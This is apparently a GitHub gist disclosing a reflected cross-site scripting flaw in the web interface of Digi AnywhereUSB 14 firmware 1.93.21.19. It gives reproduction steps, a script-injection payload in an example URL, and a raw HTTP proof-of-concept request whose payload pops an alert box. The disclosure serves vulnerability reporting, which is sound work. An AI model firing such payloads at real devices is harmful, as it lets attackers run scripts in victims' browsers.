Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
Vendor of Product: Digi International
Affected Product Code Base: AnywhereUSB - 14
Firmware Version: 1.93.21.19
Description: Digi AnywhereUSB 14 allows XSS via a link for the Digi Page.
Attack Vectors: Someone must open a link for the Digi Page
Attack Type: Remote
Payload: //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
Steps To Reproduce
1. Browse the Web Page of the Digi’s AnywhereUSB and trying not to log in
2.You can create your malicious payload like the following and run your arbitrary JavaScript code on the browser’s of the victim
Example: http://<IP Address of the Digi Anywhere USB>///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
#PoC
GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment